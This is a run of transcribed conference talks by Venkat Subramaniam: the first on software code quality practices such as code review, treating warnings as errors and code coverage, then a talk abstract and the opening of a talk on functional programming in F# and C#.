trash the place and about six months after that it would become unlivable but it was very easy we'll just move to another apartment and I thought this was life right? I mean when you're in college you know kind of what you know right? And this was like awesome you could trash the place and you could move right? And then I went on to take up a first job and when I went to take the first job is when I realized it doesn't work like the college days because there's a code base that you inherit and there's been somebody else who have moved and you are the cleaning crew at this point. What a shock I had the first time and when you leave a project and go there's a code you inherit and you got to maintain and I started learning some discipline along the way like things like mom and dad were trying so hard to teach right? You have to really have a discipline in what you do same with technical debt. So we have to take the time to pay the technical debt along the way so measure your technical debt and plan for removing them along the way and don't lead it to a bankruptcy situation. But what is really quality though? Quality is a measure of how software is designed and implemented but more so from the point of view of how effectively it can change and so a quality is extremely subjective and so you cannot just say here is an absolute definition of quality there's no litmus test. You cannot take a stick and insert into the code pull it out and say well that's red in color so that sucks. You can't really have such measure of quality it's very subjective we got to kind of evaluate it. But measuring quality is very hard how do you really find metrics? There are some very bad metrics the world has created. One of them is the lines of code. A very bad idea right? Because does it mean it's better if you have more lines of code or does it mean it's better if you have fewer lines of code? Well neither one of them is true right? Because it could be bloated code that's totally unnecessary on one hand or a very terse and cryptic code which is hard to maintain on the other hand so we cannot simply use the lines of code as a metric. Now it's very highly subjective alright but we got to have a way to measure something and it's very qualitative rather than being quantitative. So the first question I would ask is is the code readable? Now here comes the problem have you ever met somebody who says my code is not readable? Maybe a few people do but one of the biggest problems I see is when programmers think they create readable code nothing is more dangerous than that. So I have a challenge for you if you want to create readable code I think there is only one way to do that. The way to create readable code is to read it. There is absolutely no other way to do it. So if somebody writes a piece of code they have no business claiming it's readable unless somebody actually has read it and when they start reading it they throw a fit. They complain about it and when things calm down maybe you have a code that's readable. So you can never claim a code is readable unless somebody else who has other than the person who has written this has actually read it and it's got to be a couple of people to read it. So the best way to create readable code is to read it and what that means is never leave programmers in isolation. The worst kind of programmers are the programmers who write code and think they write excellent code those are the most dangerous people because what they do is they build a fort around them and say I'm cool guy I write excellent code. Hey when was the last time anybody looked at your code? Well the compiler did right so that's not enough as any human being read your code and survive the process right and if you write the code and give it to other people and to a great extent I would say good programmers are shameless they would give the code and say tell me how my code sucks. Now let me say something very quickly I'll admit to you I can never write good quality code I've given up on that I could never do it I tried really hard to write good code and I could never do it but then I realized something that I'm extremely good in finding fault with other people's code and you come to me and say Venkat write good code I'm like I can't do it but you show me a code I'll tell you a thousand things a thousand ways your code sucks so I realized I could use this to my advantage rather than pretending that I can write good code I write crappy code really quickly I give it to him to code review while I take your code and review at the end of the day we all have a better quality of code how about that so by having a quick code review we can actually improve the code rather than trying to aspire to this kind of unreachable goal pretending to write a great quality code because again that's very subjective as it turns out so why try so hard to do that is the code really verbose is it on the other hand too cryptic or the variable names and method names name appropriately that is something we have to think about is it a simple code that works that's that's really hard to answer without without being you know putting a context together does the code have tests in it what is the coverage of the test these are some of the questions we could ask so there are some ways we can improve the quality of code along the way so I'm going to talk about two ways to improve code one you as an individual and then you along with your team as a team collectively what can you do there are certain practices you can do for yourself and there are certain practices that you would need the team to do and we'll talk about both the first thing I would recommend is start early because it's impossible to really improve the quality of code all of a sudden towards the end of the project and say somehow we'll do a iteration where it'll improve quality that's a fallacy right that doesn't work that way so you got to start really early don't compromise on quality along the way have something that you maintain along the way and and if you have to really look at something bring the team together and talk about it hey can we improve this we don't want to just take a shortcut schedule time to lower your technical debt like I said earlier in your schedule linear iteration in your sprint you want to schedule a certain amount of time that you want to do the cleaning off the technical debt make it work and make it better I'm a huge fan of this mantra I'm not about getting perfection in the first run make it work first then immediately make it better that's where the red green refactor comes in also in testament development but this requires monitoring but more important it requires a change in behavior we cannot improve what we do without changing how we do things if we don't want to do anything different Einstein said the definition of insanity is to do the same thing over and over and somehow expect a better result the next time so if you want a different outcome you have to change the way you do things and reevaluate it so it requires a change in behavior and be willing to help and be willing to be helped and I believe in collaborative effort a great deal I want to be helped by other people in my team I have to be a bit shameless about it it's okay to say hey how can I improve the worst thing that can happen is that I would be a better person than I was yesterday and to be able to help also is to go to somebody and say how could I help you with this right without really hurting their feelings or emotions we can certainly do that so device lightweight non bureaucratic measures to do this so I'm going to talk a little bit about individual efforts what can you do as a person I don't believe in saying I would do all this if only my company were to do this right I don't think that's reasonable we got to do certain things ourselves and then expect the team to do the rest of the things for what first what can you do first is care about the design that you create because your design lives in your code maintainability of that is influenced are you coming with good variable names for your classes for your methods for your fields are you coming up with good names for these things and honestly I don't think I can come up with good names myself I tried really hard I would think about deeply and I would create a variable name and the minute I give the code for code review my fellow programmer says hmm why would you name it like that that's like what do you want it to be named and then you realize the context of where they are coming from and then you converge on a better name so it's okay to evolve the name but do that quickly so that you have a better name by the way long names doesn't mean it's better sometimes long names are as evil as short names but it's important to have meaningful names and you know you may say wait a minute isn't that kind of obvious well yes it is but how many times do we do that how many times do we see work on projects where there are single letter variables we all know we cannot create single letter variables but we all see single letter variables I was teaching a course in Virginia and one of the guys came to me and said hey you're talking about coding standards how how dare you do that we are a huge software company we write the software billions of dollars worth and you think you have to come and talk to us about single letter variables I kind of defended my position I said well sure if you guys do that already that's great I'm very happy for you in case you're not it's a good message to have he said well I was just pulling your leg I can't tell you how many variables we have there are single letter our code just sucks everywhere you look at it so I'm really glad you mentioned about four months later I went back to the company to teach another course the same guy comes to me and says oh Venkat remember I spoke to you last time yeah I do remember that well I want you to know that you made a difference I was so proud of it I said really he said yes you talked about not using single letters thank you for that now we use only two letters right it's extremely difficult to kill habits right bad habits so it's important to really work actively to create good variable names short methods and short classes you know single responsibility principle at the class level single responsibility principle at the method level we need to think about those things but one of the best ways to create good code is to read good code honestly most programmers don't even know how a good code looks because all that they have done is seen bad code over and over and over so if you find a good code don't keep quiet immediately call the team and say isn't that beautiful appreciate it right say how beautiful this code is and explain why you see the beauty in this code that is well worth the steps to take and others can learn from that and say ah this is the reason why this code is nice and we can learn from replicating some of these things as good quality of code so learn from reading good code and keep it simple how do you really make things simple that is a challenge right but I may make something simple and then make it simpler but a simplicity really is a way to learn that is by kind of looking at our gut feelings how do you feel about this code I know this is not very scientific approach but listen to yourself how do you feel about it and with experience that kind of comes along the way as well and learn from writing test and test with high coverage and run all the test before you check in that's a rule we maintain in our teams is we will never check in code unless all the test that we have passed and that kind of is a way to you know do quality but also to check in frequently sometimes programmers keep the code around for weeks and this is kind of scary and you want to check in code very frequently now what's good about checking code very frequently others can start to use it others can start to look at it it can improve right away and if you by the way the first thing I would recommend doing never use a version control system where you can lock files that is so 20th century right we should never do that so if your source control allows you to lock a file and gain ownership of it fire the source control system you want a system which never allows you to lock then what happens you got to check in very frequently what happens if you don't check in frequently you wait for a few days you go to check in your code and you realize that there have been so many check ins and you got to worry about merging this file so rule number one of coding you should never get merged hell you should only give it right so you absolutely have to deal with it so never get merged hell always give it so frequent reviews really help quite a bit in that regard and promote a little bit of agility as well learn your language and oftentimes programmers begin to use a language but they haven't really gained the strength of the programming language and when you ask them a deep question they kind of give you all kinds of weird answers that doesn't cut it you got to really know the language you are programming in because that's our profession right and so as a result we have to take the time so read the books on the language play with it blog read blogs about it have a time with other fellow developers where you question them if something is not clear as them how would it work why does this work and that's a good question to ask and if you're switching languages are working with multiple languages you got to know the differences between them as well and it's important to avoid the cargo cult where you just do things because that's the way it was done previously we somehow sometimes have to question and change the way we do things and we have to really court feedback and criticism from people that is very important in terms of keeping things simple really ask is this really necessary can I do something minimal to really solve the problem I know as of now and sometimes programmers do this they built a root Goldberg machine which is extremely complex and you look at this and you're scared about this code right and I remember a day when I was looking at a piece of code it was 250 lines of code to receive an X data and process and create an XML only for that to be sent to another function which was parsing it again to insert it back into the database I'm sitting there asking why am I doing this and the programmer said what if you ever want this to be extensible well but what do we know about extensibility today nothing then why are we wasting all this time and effort doing stuff we don't need to do let's only focus on what we know right now and maintain the code for that so there is a beautiful court by or here so it says there are two ways of constructing a software design one way is to make it so simple that there are obviously no deficiencies on the other way is to make it so complicated that there are no obvious deficiencies this reminds me of an experience I was at a client site I was reading through a piece of code which was extremely hard to understand I'm waiting through the code long methods complicated you know logic single letter variables I'm scratching my head and as I was trying to understand this code eventually I discovered they had a huge concurrency issue in the code this code should not be working correctly by the way and and I when I pointed this out one of the programmers got very angry at me and and the programmer said hey Venkat this code has been in production for three years what makes you think you can come in and scare us this code is not correct today how do you respond to that well thankfully I didn't have to before I could answer one of the fellow programmers said yeah but remember every three weeks it'll crash and we don't know why so yeah so that is the question right the code is so complex you don't even know what the problem is in there and you cannot get to the point so there are certain things you can do as an individual what can you do as a team of programmers first avoid shortcuts I know we are all tempted to do this along the way but avoid shortcuts wherever you can and say you know maybe this is the time to take a little bit of time and do this correctly and and let's spend the time to do this take collective ownership do not let one person own the code there should never be John's code and Sarah's code it is the team's code anybody who has the responsibility and can take the responsibility to modify the code and ensure all the test paths should be able to modify the code collective ownership is extremely important to me it and promote positive interaction now this is not too easy but we certainly have to try the words we speak how we communicate with other people makes a huge difference so rather than making people feel bad about the code they wrote let's elevate them so they feel good about writing better code and and making good change in the software and provide constructive feedback for example don't tell people your code sucks instead tell them hey why don't you break this method into two methods so don't tell them what is done poorly tell them what could be done better that is much better way of solving the problem if that is a better way to do it they can use it or if they have an even better way to do it they can always come back with it so I have a recommendation that don't tell people what's wrong instead tell people how it could be better that's a better way to communicate most of the time and do constant code reviews I know what you're thinking you're thinking are you serious you are telling us to do code reviews yeah absolutely code reviews are by far the most proven way to develop better quality software and don't take this out of context I want to emphasize it but given a choice between writing test and code review I value code review more I'm not telling you I don't value writing test please don't take that in that context but between these two I value code review a lot more and the reason is by far I've seen this to be the most effective way to really review and and improve the quality of code so this is extremely useful and I know what you're thinking you're saying yeah but code reviews never work I know what happened the last time you tried code review right you in all good faith you want to do code review you you you started doing that on your project but the day you want to do code review you sent a meeting announcement saying hey Thursday afternoon at three o'clock is the code review in room you know 1.23 and immediately or the guy whose code is going to be reviewed is thinking wait a minute that is called bash James day because everybody is going to keep there and tell how his code is sucking and he is like maybe I should call and seek that day I don't want to be at work in the meantime you know Julie is thinking I already am behind schedule I would rather sit and write my code than looking at the sticking code that James wrote in the meantime the project manager freaks out he says wait a minute code review that's the time that you did last time and we had a fight we had to call the cops and we had to shut down the company no code review for you right because code reviews have turned into a highly political and emotional endeavor and nobody wants to do it but we do code reviews all the time we not only review code we also review test cases and I work with some fantastic programmers most of the time I have no comments on their code at all but I would come back to them and say hey you need to really add these three test cases that you're missing but how in the world can you do that like I said we do this all the time and and the way we do this is is a very simple we use what is called a tactical code review rather than a team based code review so in first rule of thumb there is nobody on the team who is so great that their code doesn't have to be reviewed so we don't have this hierarchy we don't have the priest in the company that says I'm better than everybody else absolutely not everybody's code needs to be reviewed the second thing we do is if I write a piece of code as soon as I finish my task I'm gonna ask him to review the code only him and in the meantime the code he writes he is gonna review in the meantime the code he wrote she is gonna review it so we do this very tactical code review the next time I finish a task I'm not going to give it to him to review but I'm going to give it to her for review so we rotate the people who review the code and reviewing the code is part of everybody's responsibility we don't distinguish senior programmers and junior programmers in that well guess what if a junior programmer doesn't understand your code you're in as much trouble if not more than when a senior programmer doesn't understand your code so we rotate the review from among people so when I write a piece of code he reviews the first time the second task I finish he reviews it and we rotate among the team of people and you cannot say I don't have time to review code that's part of your responsibility if you don't review the code your code is waiting for somebody else to review as well so that is a time we spend along the way to review the code and improve the quality not only we review the code we also review the test cases along the way and do that as well now one of the reasons to do this is is explained really well by this code by a gentleman named Brian and he said oh we do this all the time in our company when I explain this and I said well if that is what you do tell me how you benefit from it and he nailed it he said we do code reviews because code reviews make me a hero or make me smarter I thought about this and said wow that's awesome hey Brian can I steal those words from you he said absolutely go ahead use it and then I said now you have to explain it to me what does it mean and he said code reviews make me a hero because when I give a code review to him to review he comes back and says oh darn it I've never seen that being done that way I learned something now so it improves him and he is beginning to understand the code a little differently a better way to write software but most of the time the other person comes to me and says oh you should really handle this you should really do this you should name this better and it makes me smarter because I'm learning from the code reviews he is providing so overall code reviews can be extremely beneficial and and if you ask me if there's one single change I can make to developing software that would be code reviews it is something it's very practical to do but it requires people to have the right attitude and we have done this and in projects where we did this the number of bugs we got in the code could be counted with fingers in one hand that's how few we had in parts that did not get review we had thousands of bugs in the system with comparable amount of code so there is absolutely no other recommendation I can make enough that's how convinced I am about this and I was on projects where I was also in our shoring roles where somebody wrote code elsewhere and I had to different to the clients and the easiest way I could defend to these things was every single line of code written was reviewed from both sides and I would write code and they would review it they would write code I would review it and the reason was now we were familiar with the code along the way as well and that helped us a great deal so I cannot emphasize this enough and so rigorous code review it definitely is important and it removes up to 90% of errors in the software as Bob Glass talks about in his in his book so the second recommendation for a team is treat warnings as errors now you know if you really ask yourselves how many of you have seen errors warnings in your code quite a few of us right almost everybody raises the hand and a lot of times you come to the project and you compile it and you see warnings and you say wow really and then what do you do you on the first day of the project right you are genuinely so motivated and you tell yourself I'm gonna fix all of those and then you look at how many there are and then you change your mind is like no not for me right and but what happens I was on a project and and this was a brand new project for me it's been around for a while for the company and I compiled the code and there were tons of warnings and I'm like really warnings and I thought to myself you know what they hired me to write code not to fix warnings I'm gonna ignore it a few minutes later my mind is kind of saying but I wonder what those warnings are I'm really curious right I'm inquisitive so I look at one warning I was scared it said if flag a single equals true this is in production code right I'm like no way how could this be a warning right this is not a warning this is not even an error this is something where the compiler should drag the program by the caller give a slap to him and say don't do that right and this was in production code how could this be left over there now I was shaking what else is there I don't know and I start looking at more warnings in the system and they are very very scary so the very first thing I would say is treat warnings as errors so if there is a warning your compiler stops and says I will not build this anymore okay that's great news and I was how do you do this I was suggesting to turn on a flag in visual studio to treat warning as errors and I had one guy in my team he said oh don't do that don't waste your time I was quite upset for a second I said what do you mean why don't you want to do this he said because somebody would turn off the flag one afternoon and continue to write code for three hours with warnings on it what a waste I said do you have something better to do he said absolutely I'm gonna walk up to the continuous integration machine and turn on warnings as errors because that's such a great recommendation I went up and hugged him right absolutely that is the right way to do because then nobody can slip code in there without with warnings in it I was mentioning this to a company and I was you know hearing people giggle in the back of the room so I said all right guys you seem to not like this idea and they said of course not this is terrible suggestion I said why so why is that such a terrible idea and they said well what if you are working in a legacy code oh I believe you guys have warnings and they laughed at me I said how many warnings you have they said how about a lot of warnings I said okay how about a thousand warnings and they said you don't understand the word lot do you and I'm like okay I won't ask you the numbers and I said okay you got a lot of warnings let's call it x we don't know that number that will remain unnamed and then I asked them in six months period have you had more warnings or fewer warnings and they all kind of said of course we have more warnings today than we did six months ago and what are you doing about it and they all kind of shrugged and said what do you think we can do about it so that is the very wrong way to look at it right you know if you are inheriting code that is really bad there's a name for it it's called karma right karma is your deeds you inherit things right and you cannot change your karma but you cannot say guess what you guys gave me bad code I'm going to make it worse in six months for you how about that that is professionally wrong right morally wrong so what do you do the so what I recommend to do them is the first thing you do is whatever that number is x I don't care what that number is write a stupid script I mean we as programmers can do this right write a stupid script and the script measures the number of warnings today and that becomes your value x put that script as part of your continuous integration and every time you check in code it looks for the number of warnings if the number of warnings is x or less it keeps quiet the minute the number of warnings is more than x it fails the build so what does that tell you that you added one more warning than that x number of large number of warnings you had in your code when you do remove a warning then the script resets its index x to x minus one and now you start seeing this get better over time and I mentioned this to him about three four years ago and I kind of walked away I was back at this company about six months ago and one of the developers came to me and you said they have several modules in their application today there are no warnings for the first time in 15 years and there are other modules where they still have a lot of warnings but for the first time the number of warnings is decreasing over time so my argument is it is not at all or nothing proposition you can make things better incrementally in those cases nobody in the right mind would say stop all business go fix the x number of warnings where x is large number for the next three months that is not practical but if you put in place a way to measure the number of warnings and promise that you will not create any new warnings in the system I would guarantee in six months you would have fewer warnings than you started out with and you begin to improve the quality of software as time goes on so in terms of complexity of code keep an eye on the code look for various things I am a huge fan of code coverage I know number of people who tell me that's a bad idea don't look at it but every time I look at a piece of code that has a low coverage I see a smelly code sitting in there so let me tell you how I use code coverage to me code coverage is like cholesterol number I go to the doctor and the doctor looks at me and says oh Venkat your cholesterol number is so high this is very unhealthy and I say what should I do doc well you should exercise you should eat right take this medicines come back in six months and I exercise eat right come go back in six months and the doc looks at me and says oh here are your numbers oh wonderful great job Venkat your cholesterol number is really good now immediately I set a piece of paper to him and say could you please sign here what's this 30k of good health and the doctor says no I can't do that your cholesterol number is good doesn't mean you are in good health I know this is not very encouraging right it's exactly the same your code coverage number is poor you have a problem if your code coverage number is really good you don't have that problem anymore right so it doesn't mean everything is good it doesn't reflect a better quality of code but the lack of it definitely reflects problems you have to address so when I look at it from that point of view I'm quite comfortable looking at the code coverage and I use this quite effectively and there are several tools you could use but when people argue with me and say all right I'm really right writing code here for the life of me I cannot figure out how to reach in and test this code and I usually have one recommendation for them that they seem to really not understand very well and I tell them if you don't know how to test the code why don't you remove it right well after all you're not testing that code doesn't matter it's not there right then you figure out a way to write a test for it and then write a code for it if you don't have the courage to do that I've got a suggestion for you there's a tool very appropriately named as Guantanamo it goes through your source control and deletes code with no test on it and some projects I'm scared to use it it may leave an empty drive behind right so absolutely try that and see what happens and get rid of the code that's not being covered by test cases so we talked about code coverage reduce complexity of code as much as you can how do you reduce complexity one way is to have code reviews have other people look at it if you want to use tools for this there are certain tools you could use that analyzes the code and looks at the path of the code to make this decision one of them is the Thomas McCabe index that looks at the node points and decision points through the code and determines the complexity of code but unfortunately though complexity is simply not adequate because complexity may say a problem in code but it can be compounded by other things you may argue this code is really complex for a reason but I've written a thousand tests on it I'm like okay I can live with that maybe you know temporarily with that so let's look at it a little differently let's say for a minute that I'm looking at actually I'll come back to them in a minute so you certainly want to look at the complexity of code but you want to really look at it in terms of the relationship of the code also in other words the code that's very highly complex is really hard to test as well and we really have to really break it down into simple things but in terms of code itself we have to keep it small now of course we all know we have to keep code small how many of you think that long methods are a great idea raise your hand if you do nobody is raising the hand right nobody here things long methods are good usually one person raises the hand and I ask him why he says because it's more efficient and you got to give credit that's true but that's when Nixon was the president but a lot of things have changed since then right it's a different architecture in line you know all these things have evolved so here is a different question for you at work how many of you have seen long methods look at that for a minute just look around for a minute right almost everybody here raises the hand this is called cognitive dissonance right we all know writing long methods is wrong but we all see long methods but I know how that happens because none of you here have written those long methods I know that the people who wrote those long methods are at work today making those methods longer as we speak which is kind of scary right so absolutely we got to put an end to it so if there's a second recommendation I can make for you other than code review is avoid long methods now how long is a method when it is long and somebody says 20 lines somebody says 30 lines and there's always the Ruby guys who say seven lines right how do you know what the number of lines says you say well here's an idea a method is short enough you can if you can fit the entire method into one window and don't try to lower the font size right okay that's another metric you could create but if you really want to think about it it is not the number of lines of code that matters what really matters for the length of the method is the method should do one thing and be at one level of abstraction in the code that is the real key so as long as your method can be focused at one level of abstraction then you'd usually answer being relatively small and so make it cohesive single responsibility principle and one level of abstraction is very critical for us to do keep it dry remote duplication of code duplicated code is one of the other ways we can improve software quality by removing the duplication so actively find there are tools that you could use for example there's a tool called PMD for Java Simeon for.net the word Simeon means monkey meaning you monkey with the code so you can do analysis Simeon analysis and find out where the code is duplicated and you can remove actively duplicated code in the system but if you really want to address the quality of software let's think about this a little differently if I tell you my code is low complexity and I tell you that the code is really having low automated tests then I would argue that the risk is fairly high because a code that is not tested is a risky code because what happens when you modify the code think about that for a minute what happens when you change the code when you don't have tests that's exactly the reaction you do this and you go to the programmers and say does your code work after you change and the programmers say something wonderful the programmer says I hope what a beautiful word but there is a name for it that's called JDD stands for Jesus driven development right it's okay to have faith in the Lord is a good thing but I don't want to trouble the Lord with silly code I write I want TDD not JDD right so when you have a low automated test in your code it becomes extremely hard and you have to rely on hope and shrugs and there is no feedback cycle to tell you that your code works so automated tests tell you that not only the code worked before but they continue to work the code as you evolve it so if you have a low complex code with low coverage I rate it as a high risk but what if I have a low complexity and high coverage that is the beautiful land you want to live in right that's great what if you have high complexity and low automated test case that is higher risk than high this is the world you don't want to even dream in your nightmares right and then of course high coverage and high complexity is all right but how do you really explain this to the team and say your code really is in a bad shape so there is actually an interesting metric for it it is called the change risk analysis prediction and change risk analysis prediction is a wonderful metric and what the change risk analysis prediction metric says is that it says I'm going to analyze the complexity of your code I'm going to look at the coverage of your code in terms of test and I'm going to put those together and measure the so-called crap threshold and the crap threshold says that your code has been moved into crappy territory so you don't have to tell the team the code is crappy you can show it to them now right and there are tools like crap for j and crap for n that measure these values for you and tell you what the value of the crappy threshold is so you could use tools like this to measure the quality of software and gain an impression on quality as well so take a look at some of those tools and as this beautiful court says it was one of my journeys between the edsac room and the punching equipment that the relation came over me with full force the good part of the reminder of my life was going to be spent in finding errors in my own program that is pure courage isn't it and and that is a realization we as have to arrive as programmers is that we have to deal with it so we have to deal with code smell can't be coined this term called code smell what a beautiful metaphor code smell because why is this a great metaphor because you enter a room and you your your nose twinches a little bit because you smell something and you say it smells funny here isn't it and everybody in the room kind of look at you and say really because nobody feels anything and you sit there and start working and you kind of look around like it's really smelling here isn't it and 30 minutes goes by and you've entered this quietness you don't feel that anymore your senses have dulled down and you're part of that smell environment and the next guy walks in isn't it smelly here and you look up and join the other people really right so that is why it's such a great metaphor what happens when you join a project the first day on the project look at this code and say who the heck wrote this code and you join the project six months later you don't feel a thing you are writing code in the product right and we tend to lose senses over time so it's important to be sensitive to this and clear up things as soon as we can otherwise we kind of get lull in the senses and we kind of tend to lose that so look at the code smells and identify that what are some of the code smells you can think of duplication in code for example unnecessary complexity in code and various other factors you can take a look at right so how do you deal with code smell keep an eye on it pay attention to it clean it up schedule time for paying those technical debt as well you say you know what that code is smelly I'm not going to do it right now but I'm going to schedule time for it to be cleared right so this is something we could learn from William Zinser I'm not going to spend time on it but he talks about some ways to really make good communication writing English and he talks about simplicity clarity brevity and humanity and those recommendations really are good for writing code as well I want you to kind of take a look at it later on second thing I would say is throw exceptions but be careful when you should throw exceptions sometimes people just throw exceptions all the time I would evaluate this very clearly given a situation and decide whether it's the right thing second thing don't write clever code write clear code I can't tell you how many times I've been bitten by writing clever code and when you write clever code you think it's really cool but nobody else understands it and then it comes back to haunt you so I used to write clever code these days the minute I write the code if I feel it's clever I immediately delete it and I start over because it's so scary it gives me problems eventually and don't rush to write code take the time writing quality code takes time to build and you have to devote the time to do it you cannot do it in a rush what about commenting code I have to tell you commenting code is one of my pet peeves and a lot of times comments are pretty useless comments are often written to cover a bad code I want comment to tell me why the code exists I want the comment to tell me something that I cannot just learn from reading the code so type of comments are really really hate for example so one example this is this nothing makes me angry more than this somebody writes a class class car and then they write public car and then constructor it's like very important thank you right or even better right there was a day I was looking at a piece of code it said I plus plus with the beautiful increment I'm like so thank you so much for clarifying that I was just not sure looking at the code right these are absolutely useless so instead focus on writing comments that tell you something extremely useful about why it even exist in place so to me a good code is like a good joke when was the last time you said a joke and nobody understood it and you start to explain it and they got it so the number rule of rule number one rule of telling joke never explain a joke right because they didn't get a joke you say let me explain it to you and they listen to you painfully and say yeah what's funny about that and then you try let me explain it to you it gets very painful right a good code is like that you just say it and it's got a click and they get it if they don't get it what do you do you go home that night that night and you refactor your joke and that's exactly what you do with the code right don't comment the code rewrite it refactor it so it's easier for people to understand it so make the code self documented I saw this code in a client site which was very painful to see this is a code which is extremely scientific very hard to maintain and as I was reviewing the code I saw somebody comment God help I have no idea what this means and their entire application had these fields which were L 1 L 2 this were extremely scientific and you can imagine what it takes to maintain the software so give good names and make it clear and self documenting so you don't have to really write comments for those things and finally to talk about it throw the error on your face don't ask people to go dig through log files to find errors make it very easy for them to approach it and find it so I want to summarize what we talked about with about 10 points we can take away as the final thoughts to leave you with the first thing is practice tactical peer based code review I cannot overemphasize that I already did but I want to emphasize practical you know code review tactical code review is very important consider untested code as unfinished code I believe in automated test it takes a certain amount of effort to write these tests but the investment pays off very huge well worth spending the time and effort to do that make your code coverage and metrics visible this is so useful I can tell you how if you push this out into monitors in your coffee machine as people walk around they look at the visible code coverage and bug count and metrics now it's a pressure on everybody to do better and even better right if I come to the coffee machine my code metrics are displayed my project code metrics are displayed his project code metrics are displayed and his is so much better than mine guess what I'm going to do I'm going to run into him and say hey great job you guys you're doing really well on your project I saw the metrics oh well thank you very much he's very modest right and I say no no no please tell me what are you guys doing this is one thing that bothers me a lot I walk into large companies as a consultant I would talk to one group of people doing some wonderful things in the afternoon they will say go talk to this team and they would have no knowledge of this happening on the second floor I would say guys the guys on the second floor are doing this really and they don't talk to each other by putting this out you're making aware as to what people are doing and where to go for some information between companies with between teams don't tolerate anyone trashing your code take it very serious if somebody breaks your build or writes poor quality code immediately go back and say hey what's going on here how can I help to make this better we don't want this kind of poor quality code here let's improve this together and write a self-documentary code and comment wise and not what it does we talked about that you still such a quality of code and automate it as much as you can and continuously measure this along the way and treat warnings as errors I talked about this already and keep it really small as much as you can and keep it as simple as you can you can take a look at some of these references later on thank you very much for your time I really appreciate it.
|
We all have seen our share of bad code. We certainly have come across some good code as well. What are the characteristics of good code? How can we identify those? What practices can promote us to write and maintain more of those good quality code. This presentation will focus on this topic that has a major impact on our ability to be agile and succeed.
|
10.5446/50995 (DOI)
|
All right. Good morning. Welcome to the session on Thinking in Functional Style in F-sharp and some C-sharp. My name is Venkat Subramaniam. We're going to talk about functional programming. Best time to ask a question or make a comment is when you have it. So please don't wait in the very end. Just about any time is a great time for questions, comments. If you do have a question or a comment, do draw my attention. If you raise your hand, I may not be able to see you. So just start speaking or just call out my name or make some noise that draws my attention towards you and I'll yield to you and respond to your question or comment. We're going to talk about functional programming. I'm going to do a little bit of talking, quite a bit of coding. I'm not going to use any slides here in this presentation. I'm going to just write some code, play with some examples. I'll write a little bit more F-sharp than C-sharp, but certainly I'll show you some features in C-sharp. Pretty much what we're going to talk about here, you could be doing it in almost any language today on the modern operating systems and most of the platforms today. So with Lambda Expressions available in most languages, it shouldn't be a problem at all. So let's start with functional programming. So what is a functional language? Before I get to the question, it kind of intrigues me to even think about this. If some languages are functional, does it mean other languages are dysfunctional? It kind of makes me wonder, right? So what's a functional language? What is it really about? So if you go back to thinking about programming and back in time, structured programming, one of the things that Dykstra talked about was go-to's are evil. Every time somebody writes a go-to statement, Dykstra moves in his grave, right? Because you don't want to be writing go-to statements, but it doesn't mean that go-to's doesn't happen in the code. In a similar way, one of the things that functional programming talks about is to write assignment-less programming. And when it comes to assignment-less programming, you really want to program with immutability where nothing really changes. And that really puts a little bit of a burden on us because then we are focusing on thinking about how in the world do I really write any practical application where nothing really changes. So even though immutability is a very important part of functional programming, that is not really the most important opinion. It's really about transformation of state rather than mutability of state. And that's kind of what I want to arrive at today in this discussion. So I'll start out by talking about functional programming just a little bit. We'll spend a little bit of time about mutability and immutability. Then we'll talk about pure functions. We'll talk about higher-order functions. And then we'll talk about a few ways to use these higher-order functions in writing code that shows the difference between imperative style versus functional style of coding. And then, of course, eventually, finally, we'll talk about how we could actually apply this to some real example. We'll take an example of function composition that shows how elegantly we can put this together to do something useful. So in terms of functional programming itself, there is this concept of function purity that we are interested in developing. And when it comes to programming, this really has been around. So let's take a look at an example for a minute. Don't worry about being wrong. I'm wrong most of the time, or my wife says that quite often. But the question is, what year do you think object-oriented programming was created? Just throw a number at me. Very close enough, 1967. When do you think most people got excited about OOP? Not last week. Not in Bob's talk yesterday. When was it? Nineties, right? Early nineties, late eighties. And what made that happen? It's OK. You can say it, C++, right? Yeah, C++ made that happen. And certainly, it took a good 23 years for this concept to really become mainstream. If OOP was a human, it had a terrible childhood, right? Nobody wanted to even look at this guy until 23 years old. Oh, isn't he cute? Let's pay attention to this guy, right? And functional programming has been around even longer. We're about 50 years now, scary. And finally, we are paying attention to it. Why so? And the reason is, about 2003 timeframe, an engineer walked up his boss and said, it ran really fast before it melted. He was talking about the chips. And we had to really go to multi-core processors. Well, OK, what's the big deal? We could program multi-threading in most of the languages today. What difference does it make? Well, it turns out on a single processor, multi-threading is more multitasking. On a multi-core processor, you really have threads running on steroids concurrently. And it turns out that developing concurrent applications in traditional way is extremely difficult. It is very error-prone. So what is causing this error? One of the things that causes this error is the so-called shared mutability. And shared mutability really is a big deal because when you think about mutability, mutability itself is not a big deal, right? You're modifying some data. What about sharing? Sharing is a good thing. Remember what mom told you, right? Share, that's a good thing to do. But shared mutability is devil's work. And the minute you bring shared mutability into picture, you have to worry about making sure multiple threads don't collide and crash and change the data at the same time and the code becomes extremely complex. And what do you do to avoid this problem? You start putting locks around your code. And when you do that, just because you put locks doesn't mean your code is correct. And there is no language today. There is no environment today that tells you that you have done the locking correctly at the right place at the right time to the right degree. And so most of the concurrent applications out there are broken and we just don't know it. It's extremely hard to write such code. One way to solve this problem is to remove the problem at the very fundamental root and that is to really create what is called a pure functional code. A pure functional code is a code that doesn't modify anything. Now functional programming has been exciting for two categories of people. One is mathematicians and people who are interested in proving correctness of code. I don't think anybody here is interested in correctness code, right? We are interested in living on the edge. Who cares about correctness, right? Well, but they care about it. They want to know if the code is correct and it's easier to prove correctness of a code if it doesn't mutate anything. It's easier to, you know, establish concepts in that regard. But the other reason why purity is interesting is imagine for a minute that you have two expressions on your hand. This brings back fond memories, by the way. This was a long time ago, several years ago, I had, I was working on a project and this was a C++ application and we had a wonderful programmer and he screamed one evening and he found out that there was one, you know, expression in our application that was yielding some wrong results. It was giving an error at the seventh decimal place. You know what? I would have ignored that for most part. But this guy was so meticulous, he spent three nights in the room working on this problem. How do we know nobody could go near him, right? He hasn't showered for three days. And this guy comes out of three days and says, I found the problem and some moron had written this code where they are incrementing the variable twice in one expression. And in his book, Beyond Stools Strip, clearly says don't do this. And the reason is because it's very difficult to predict the sequence in which these operations have to happen. So in other words, when a code has mutability in place, it's extremely hard to predict the behavior of the code. But imagine for a minute I have two expressions on my hand where the expressions don't depend on each other but the net result of them are going to be used further down in the chain. What I can do is I can run as a compiler, I can say I want to run the expression one first and then I want to run expression two. That's perfectly fine. But I also at will can decide to run expression two first and then I can run expression one. Or more interesting, I can delegate these two expressions to run concurrently on multi-core processors across multiple cores if I want to. And so this, by the way, is called the referential transparency. In other words, if functions are pure, it's much easier for referential transparency to be implemented. It becomes a lot more easier to 